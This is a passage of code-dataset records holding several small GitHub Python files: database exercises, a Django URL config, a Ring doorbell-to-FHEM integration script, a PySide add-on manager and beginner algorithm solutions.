for x in User.query.all():\n print(\"Nome: {} [ {} ]\".format(x.name, x.email))\n user1 = User.query.filter(User.name == 'admin').first()\n print(\"Nome: {:30}: [ {} ]\".format(user1.name, user1.email))\n\n # Atualiza\n #user1.email = \"admin@teste\" \n #db_session.flush()\n #db_session.commit()\n\n #apagando\n #db_session.delete(user1)\n #db_session.commit()\n\n\n #query.filter(User.name.like('%ed%'))\n #query.filter(User.name.in_(['ed', 'wendy', 
'jack']))\n #from sqlalchemy import and_\n #query.filter(and_(User.name == 'ed', User.fullname == 'Ed Jones'))\n #from sqlalchemy import or_\n #query.filter(or_(User.name == 'ed', User.name == 'wendy'))\n #query.filter(User.name.like('%ed')).count()\n\n\n\ndef teste2a():\n \"\"\"\n Iniciando o banco\n \"\"\"\n from database import init_db\n init_db()\n\n\nif __name__ == \"__main__\":\n teste2()\n","repo_name":"amk2/venv","sub_path":"ex09_teste_sqlalchemy.py","file_name":"ex09_teste_sqlalchemy.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36513741085","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('new/', views.new, name= 'new'),\n path('edit/', views.edit, name='edit'),\n path('detail/', views.detail, name = 'detail'),\n path('delete/', views.delete, name='delete'),\n path('/comment/create', views.comment_create, name=\"comment_create\"),\n path('/comment//delete', views.comment_delete, name=\"comment_delete\"),\n path('/comment//edit', views.comment_edit, name=\"comment_edit\"),\n]\n","repo_name":"Eunjijjang/saisai","sub_path":"saisai/board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21637043171","text":"# coding=utf-8\n\nimport xlrd\nimport json\nfrom pymongo import MongoClient\n\n# 连接数据库\nclient = MongoClient('localhost', 27017)\ndb = client.douban\naccount = db.movie_model\n\ndata = xlrd.open_workbook('douban_Top250.xls')\ntable = data.sheets()[0]\n# 读取excel第一行数据作为存入mongodb的字段名\nrowstag = table.row_values(0)\nnrows = table.nrows\nreturnData = {}\nfor i in range(1, nrows):\n # 将字段名和excel数据存储为字典形式,并转换为json格式\n returnData[i] = json.dumps(dict(zip(rowstag, table.row_values(i))))\n # 通过编解码还原数据\n returnData[i] = json.loads(returnData[i])\n account.insert_one(returnData[i])\nprint(\"数据保存到MongoDB数据库中成功!!!\")\n","repo_name":"TongGod/daily_code","sub_path":"爬虫项目/豆瓣电影TOP250分析/save_mongodb.py","file_name":"save_mongodb.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"20552965141","text":"from ring_doorbell import Ring\nimport time\nimport fhem\nimport logging\nfrom thread import start_new_thread, allocate_lock\n\n\n# CONFIG\nring_user = 'user@domain.com'\nring_pass = 'password'\nfhem_ip = '127.0.0.1'\nfhem_port = 7072 # Telnet Port\nlog_level = logging.DEBUG\nfhem_path = '/opt/fhem/www/ring/' # for video downloads\nPOLLS = 2 # Poll every x seconds\n\n# LOGGING\nlogger = logging.getLogger('ring_doorbell.doorbot')\nlogger.setLevel(log_level)\n\n# create file handler which logs even debug messages\nfh = logging.FileHandler('ring.log')\nfh.setLevel(logging.DEBUG)\n\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nfh.setFormatter(formatter)\n\n# add the handlers to the logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\nlogger = logging.getLogger('fhem_ring')\nlogger.setLevel(log_level)\nlogger.addHandler(ch)\nlogger.addHandler(fh)\n\n\n# Connecting to RING.com\nmyring = Ring(ring_user, ring_pass)\n\nfh = fhem.Fhem(fhem_ip, fhem_port)\n\ndef sendFhem(str):\n 
logger.debug(\"sending: \" + str)\n global fh\n fh.send_cmd(str)\n\ndef askFhemForReading(dev, reading):\n logger.debug(\"ask fhem for reading \" + reading + \" from device \" + dev)\n return fh.get_dev_reading(dev, reading)\n\ndef askFhemForAttr(dev, attr, default):\n logger.debug(\"ask fhem for attribute \"+attr+\" from device \"+dev+\" (default: \"+default+\")\")\n fh.send_cmd('{AttrVal(\"'+dev+'\",\"'+attr+'\",\"'+default+'\")}')\n data = fh.sock.recv(32000)\n return data\n\ndef setRing(str, dev):\n sendFhem('set Ring_' + dev.name.replace(\" \",\"\") + ' ' + str)\n\ndef attrRing(str, dev):\n sendFhem('attr Ring_' + dev.name.replace(\" \",\"\") + ' ' + str)\n\ndef srRing(str, dev):\n sendFhem('setreading Ring_' + dev.name.replace(\" \",\"\") + ' ' + str)\n\nnum_threads = 0\nthread_started = False\nlock = allocate_lock()\n\ndef getDeviceInfo(dev):\n dev.update()\n logger.info(\"Updating device data for device '\"+dev.name+\"' in FHEM...\")\n srRing('account ' + str(dev.account_id), dev)\n srRing('address ' + str(dev.address), dev) \n srRing('family ' + str(dev.family), dev) \n srRing('id ' + str(dev.id), dev) \n srRing('name ' + str(dev.name), dev) \n srRing('timezone ' + str(dev.timezone), dev) \n srRing('doorbellType ' + str(dev.existing_doorbell_type), dev)\n srRing('battery ' + str(dev.battery_life), dev)\n srRing('ringVolume ' + str(dev.volume), dev)\n srRing('connectionStatus ' + str(dev.connection_status), dev) \n srRing('WifiName ' + str(dev.wifi_name), dev) \n srRing('WifiRSSI ' + str(dev.wifi_signal_strength), dev) \n \n\ndef pollDevices():\n logger.info(\"Polling for events.\")\n global devs\n\n i=0\n while 1:\n for k, poll_device in devs.items():\n logger.debug(\"Polling for events with '\" + poll_device.name + \"'.\")\n if poll_device.check_alerts() and poll_device.alert:\n dev = devs[poll_device.alert.get('doorbot_id')]\n logger.info(\"Alert detected at '\" + dev.name + \"'.\")\n logger.debug(\"Alert detected at '\" + dev.name + \"' via '\" + poll_device.name + \"'.\")\n alertDevice(dev,poll_device.alert)\n time.sleep(POLLS)\n i+=1\n if i>600:\n break\n\ndef alertDevice(dev,alert):\n srRing('lastAlertDeviceID ' + str(dev.id), dev)\n srRing('lastAlertDeviceAccountID ' + str(dev.account_id), dev)\n srRing('lastAlertDeviceName ' + str(dev.name), dev)\n srRing('lastAlertSipTo ' + str(alert.get('sip_to')), dev)\n srRing('lastAlertSipToken ' + str(alert.get('sip_token')), dev)\n if(alert.get('kind') == 'ding'):\n setRing('ring', dev)\n srRing('lastAlertType ring', dev)\n his = dev.history(limit=100,kind='ding')\n if(len(his)>0):\n dev.recording_download(his[0]['id'], filename=fhem_path + 'last_ding_video.mp4',override=True)\n srRing('lastDingVideo ' + fhem_path + 'last_ding_video.mp4', dev)\n elif(alert.get('kind') == 'motion'):\n setRing('motion', dev)\n srRing('lastAlertType motion', dev)\n his = dev.history(limit=100,kind='motion')\n if(len(his)>0):\n dev.recording_download(his[0]['id'], filename=fhem_path + 'last_motion_video.mp4',override=True)\n srRing('lastMotionVideo ' + fhem_path + 'last_motion_video.mp4', dev)\n srRing('lastCaptureURL ' + str(dev.recording_url(dev.last_recording_id)), dev)\n\n\n\n# GATHERING DEVICES\ndevs = dict()\npoll_device = None\ntmp = list(myring.stickup_cams + myring.doorbells)\nfor t in tmp:\n devs[t.account_id] = t\n # all alerts can be recognized on all devices\n poll_device = t # take one device for polling\n\nlogger.info(\"Found \" + str(len(devs)) + \" devices.\")\n\n# START POLLING DEVICES\ncount = 1\nwhile count<6: # try 5 times\n try:\n 
while 1:\n for k, d in devs.items(): getDeviceInfo(d)\n pollDevices()\n\n except Exception as inst:\n logger.error(\"Unexpected error:\" + str(inst))\n logger.error(\"Exception occured. Retrying...\")\n time.sleep(5)\n if count == 5:\n raise\n\n count += 1\n","repo_name":"markuzzi/ring-fhem","sub_path":"ring.py","file_name":"ring.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7841130689","text":"from src.models.order import (\n add_product_order_items,\n create_order_items,\n remove_order_items,\n remove_product_order_items\n)\nfrom src.models.user import get_user_by_email\nfrom src.server.database import connect_db, db, disconnect_db\nfrom bson.objectid import ObjectId\n\n\nasync def order_crud():\n option = input(\"Entre com a opção de CRUD (order): \")\n \n await connect_db()\n order_collection = db.order_collection\n\n product_id = ObjectId(\"6325d2760b2b7841417c501f\")\n product_id2 = ObjectId(\"63307521df2fbdcac09a1cdd\")\n carrinho_id = \"6330d45cfed6a20ce04e625b\"\n user_email = \"lu2_domagalu@gmail.com\"\n\n if option == '1':\n user = await get_user_by_email(\n db.users_collection,\n user_email\n )\n order = await create_order_items(\n db.order_items_collection,\n user,\n product_id\n )\n print(order)\n elif option == '2':\n produto_adicionado = await add_product_order_items(\n db.order_items_collection,\n product_id2,\n carrinho_id\n )\n print(produto_adicionado)\n elif option == '3':\n produto_removido = await remove_product_order_items(\n db.order_items_collection,\n product_id2,\n carrinho_id\n )\n print(produto_removido)\n elif option == '4':\n carrinho_removido = await remove_order_items(\n db.order_items_collection,\n carrinho_id\n )\n print(carrinho_removido)\n\n await disconnect_db()\n","repo_name":"rafawessling/projeto_mongodb_carrinho","sub_path":"src/controllers/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16018744183","text":"# 21. 
Merge Two Sorted Lists\n# 두 정렬 리스트의 병합\n# 정렬되어 있는 두 연결 리스트를 합쳐라.\n\n# testcase\n# Input: list1 = [1,2,4], list2 = [1,3,4]\n# output: [1,1,2,3,4,4]\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\ndef sol(list1, list2):\n if (not list1) or (list2 and list1.val > list2.val):\n list1, list2 = list2, list1\n\n if list1:\n list1.next = sol(list1.next, list2)\n\n return list1\n","repo_name":"nash4826/Python-Algorithm","sub_path":"linkedList/question14.py","file_name":"question14.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34714074666","text":"from PySide.QtGui import QMainWindow, QTabWidget, QWidget\n\nfrom siding import addons, style, plugins\n\n###############################################################################\n# Constants and Storage\n###############################################################################\n\n_manager_window = None\n\n###############################################################################\n# The AddonTypeTab Class (with a horrible name)\n###############################################################################\n\nclass AddonTypeTab(QWidget):\n \"\"\"\n An instance of this class is created for each type of add-on registered\n with the system.\n \"\"\"\n\n def __init__(self, type, parent=None):\n QWidget.__init__(self, parent)\n\n # Get our info.\n self.name = type\n text, self.icon = addons.manager._types[type][-2:]\n if text:\n self.text = text\n else:\n self.text = ' '.join(x.capitalize() for x in\n self.name.replace('_').split(' '))\n\n if not self.icon:\n self.icon = ''\n\n # Set some stuff.\n self.setWindowTitle(self.text)\n self.setWindowIcon(style.icon(self.icon))\n\n###############################################################################\n# The ManagerWindow Class\n###############################################################################\n\nclass ManagerWindow(QMainWindow):\n \"\"\"\n This is the Add-on Manager's custom window. Not much else to say, really.\n \"\"\"\n\n def __init__(self, parent=None):\n ManagerWindow.__init__(self, parent)\n\n # Set the window title and size.\n self.setWindowTitle(self.tr(\"Add-on Manager\"))\n self.setMinimumSize(400, 300)\n\n # Build the main widget.\n self.tabs = QTabWidget(self)\n self.setCentralWidget(self.tabs)\n\n # Load up all our tabs.\n for addon_type in sorted(addons.manager._types.keys()):\n tab = AddonTypeTab(addon_type)\n self.tabs.addTab(tab, tab.windowIcon(), tab.windowTitle())\n\n # Let plugins get in on this.\n plugins.run_signal('opened_addon_manager', self)\n\n # Icons and Style!\n style.enable_aero(self)\n self.reload_icons()\n style.style_reloaded.connect(self.reload_icons)\n\n def reload_icons(self):\n \"\"\" Reload all of our icons. Which is... one icon. \"\"\"\n self.setWindowIcon(style.icon('addon-manager'))\n\n def showRaise(self):\n \"\"\" Show and raise the window. \"\"\"\n self.show()\n self.raise_()\n self.setFocus()\n\n ##### The Close Event #####################################################\n\n def closeEvent(self, event):\n \"\"\" Disconnect any signals and remove our reference. 
\"\"\"\n global _manager_window\n if _manager_window is self:\n _manager_window = None\n\n style.style_reloaded.disconnect(self.reload_icons)\n plugins.run_signal('closed_addon_manager', self)\n\n###############################################################################\n# The Starting Point\n###############################################################################\n\ndef show():\n \"\"\" Show the Add-on Manager's user interface. \"\"\"\n global _manager_window\n\n if not _manager_window:\n _manager_window = ManagerWindow()\n\n # Show the manager.\n _manager_window.showRaise()","repo_name":"stendec/siding","sub_path":"siding/addons/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"51"} +{"seq_id":"71294354397","text":"# 1- Bir listeyi düzleştiren (flatten) fonksiyon yazın. Elemanları birden çok katmanlı listelerden ([[3],2] gibi) oluşabileceği gibi, non-scalar verilerden de oluşabilir. Örnek olarak:\n# input: [[1,'a',['cat'],2],[[[3]],'dog'],4,5]\n# output: [1,'a','cat',2,3,'dog',4,5]\n#\n# 2- Verilen listenin içindeki elemanları tersine döndüren bir fonksiyon yazın.\n# Eğer listenin içindeki elemanlar da liste içeriyorsa onların elemanlarını da tersine döndürün. Örnek olarak:\n# input: [[1, 2], [3, 4], [5, 6, 7]]\n# output: [[[7, 6, 5], [4, 3], [2, 1]]\n\n\ndef flatten(list0):\n \"\"\"\n Eğer list0 'ın elemanı bir liste değilse bu elemanı yeni listeye ekler.\n Eğer list0 'ın elemanıda bir liste ise fonksiyon kedisini çağırır(recursion). Böylece eleman liste olmayana kadar fonksiton kendini çağırır ve\n sonunda eleman bir liste değilse onu yeni listeye ekler.\n \"\"\"\n new_list = []\n for idx in list0:\n if isinstance(idx, list):\n new_list += flatten(idx)\n else:\n new_list.append(idx)\n\n return new_list\n\n\n# example for flatten function\nl = [[1, 'a', ['cat'], 2], [[[[[[[10, 20, ['x']]]]]]]], [[[3]], 'dog'], 4, 5]\n\nprint(flatten(l))\n\n\ndef reversed_elements(list0):\n \"\"\"\n Önce listenin elemanlarını slacing yöntemi kullanarak sondan başlayacak şekilde modifiye eder.\n Sonra listenin elemanlarıda bir liste mi diye kontrol edip eğer listeyse aynı işlem yine yapılır.\n \"\"\"\n \"\"\"\n Önce listenin elemanlarını slacing yöntemi kullanarak sondan başlayacak şekilde modifiye eder.\n Sonra listenin elemanlarıda bir liste mi diye kontrol edip eğer listeyse aynı işlem yine yapılır.\n \"\"\"\n list0 = list0[-1::-1]\n for idx in list0:\n if isinstance(idx, list):\n index = list0.index(idx) # düzenleyeceğimiz elemanın list0 içindeki indexsini bulma\n new_idx = idx[-1::-1]\n list0[index] = new_idx # düzenlediğimiz elemanı listenin ilgili kısmına koyuyoruz\n return list0\n\n# example for reserved_elements function\nprint(reversed_elements([[1, 2], [3, 4], [5, 6, 7]]))\n","repo_name":"evrnekc/patika_python_odevler","sub_path":"odev1.py","file_name":"odev1.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9194865043","text":"'''\nLesson2 - CyclicRotation\nhttps://app.codility.com/programmers/lessons/2-arrays/cyclic_rotation/\n'''\n# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A, K):\n # write your code in Python 3.6\n length = len(A)\n if length <= 1:\n return A\n new_array = [None] * length\n for i in range(length):\n new_array[(i+K)%length] = A[i]\n return 
new_array","repo_name":"ImmortalGarlic/coding-practice","sub_path":"codility/lesson2-arrays/CyclicRotation.py","file_name":"CyclicRotation.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}